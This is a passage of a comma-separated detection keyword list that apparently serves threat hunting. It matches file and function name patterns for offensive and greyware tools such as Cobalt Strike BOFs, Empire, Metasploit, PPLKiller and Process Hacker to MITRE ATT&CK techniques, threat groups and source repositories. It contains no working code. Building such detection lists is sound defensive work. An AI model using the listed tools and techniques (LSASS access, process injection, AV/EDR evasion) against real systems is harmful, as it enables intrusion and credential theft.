menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,1,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*Process_Protection_Level_BOF/*,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,1,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*process_snapshot.exe*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*ProcessCommandChannelImplantMessage*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*ProcessDestroy.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessDestroy.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessDestroy.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessDestroy.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessEncryptedC2Request*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*ProcessFileZillaFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*processhacker-*-sdk.zip*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*processhacker-*-setup.exe*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*processhacker-*-src.zip*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*ProcessHacker.exe*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*ProcessHacker.sln*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*ProcessHerpaderping_x64*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ProcessHerpaderping_x86*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ProcessHerpaderpingTemplate*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*processhider.c*,offensive_tool_keyword,Sudomy,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*-ProcessID * -Dll * -Module *,offensive_tool_keyword,empire,empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*processImplantMessage*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*process-inject *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*processinject_min_alloc*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*ProcessManager.exe --machine 
*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*ProcessManager.exe --name explorer*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*processPIDByName*lsass.exe*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*ProcessPPKFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessPuTTYLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessRDPFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessRDPLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessSuperPuTTYFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Process-TaskingPackets*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
